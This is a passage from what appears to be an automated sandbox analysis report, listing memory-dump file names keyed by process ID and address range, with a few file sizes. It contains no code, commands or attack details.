                                                                                                                                                                                          • memory/4948-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/4976-200-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            80KB

                                                                                                                                                                                          • memory/4976-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5088-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5156-378-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5164-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5204-383-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5244-391-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            4KB

                                                                                                                                                                                          • memory/5244-384-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5296-389-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5296-400-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                            Filesize

                                                                                                                                                                                            436KB

                                                                                                                                                                                          • memory/5368-392-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5384-394-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5404-395-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5432-399-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5448-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5520-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5612-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5732-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5868-462-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/5980-467-0x00007FF7267E4060-mapping.dmp
                                                                                                                                                                                          • memory/6004-468-0x0000000000000000-mapping.dmp
                                                                                                                                                                                          • memory/6120-443-0x0000000000000000-mapping.dmp